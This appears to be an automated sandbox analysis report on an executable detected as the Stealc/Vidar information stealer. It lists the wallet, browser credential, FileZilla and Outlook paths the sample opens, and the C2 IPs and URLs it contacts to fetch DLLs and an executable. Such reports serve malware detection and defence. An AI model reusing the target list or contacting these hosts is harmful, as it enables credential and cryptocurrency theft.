Source: T220UXIoKO.exe String found in binary or memory: \jaxx\Local Storage\
Source: T220UXIoKO.exe String found in binary or memory: \Ethereum\
Source: T220UXIoKO.exe String found in binary or memory: eam Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\
Source: T220UXIoKO.exe String found in binary or memory: Ethereum
Source: T220UXIoKO.exe String found in binary or memory: file__0.localstorage
Source: T220UXIoKO.exe String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: T220UXIoKO.exe String found in binary or memory: \Exodus\exodus.wallet\
Source: T220UXIoKO.exe String found in binary or memory: iDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json
Source: T220UXIoKO.exe String found in binary or memory: |1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|Mul
Source: T220UXIoKO.exe String found in binary or memory: eam Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\
Source: T220UXIoKO.exe String found in binary or memory: eam Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\T220UXIoKO.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\T220UXIoKO.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\T220UXIoKO.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: T220UXIoKO.exe PID: 6592, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.T220UXIoKO.exe.830e67.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.T220UXIoKO.exe.880000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T220UXIoKO.exe.830e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.T220UXIoKO.exe.880000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T220UXIoKO.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T220UXIoKO.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2934433959.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2934347582.0000000000830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1682295630.0000000000880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2933833911.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: T220UXIoKO.exe PID: 6592, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: T220UXIoKO.exe PID: 6592, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C8B0C40 sqlite3_bind_zeroblob, 0_2_6C8B0C40
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C8B0D60 sqlite3_bind_parameter_name, 0_2_6C8B0D60
Source: C:\Users\user\Desktop\T220UXIoKO.exe Code function: 0_2_6C7D8EA0 sqlite3_clear_bindings, 0_2_6C7D8EA0
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.98.131.200
 sirault.be France
16347 RMI-FITECHFR false
109.107.157.208
 unknown unknown
29314 VECTRANET-ASAlZwyciestwa25381-525GdyniaPolandPL true

Contacted Domains

Name IP Active
sirault.be 185.98.131.200 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://109.107.157.208/49aaa1bd4c594849.php true
    		unknown
    http://109.107.157.208/74bc575e584e922c/softokn3.dll true
      		unknown
      http://109.107.157.208/74bc575e584e922c/vcruntime140.dll true
        		unknown
        https://sirault.be/chrome_93.exe false
          		unknown
          http://109.107.157.208/74bc575e584e922c/nss3.dll true
            		unknown
            http://109.107.157.208/74bc575e584e922c/freebl3.dll true
              		unknown
              http://109.107.157.208/ true
                		unknown
                http://109.107.157.208/74bc575e584e922c/mozglue.dll true
                  		unknown
                  http://109.107.157.208/74bc575e584e922c/msvcp140.dll true
                    		unknown
                    http://109.107.157.208/74bc575e584e922c/sqlite3.dll true
                      		unknown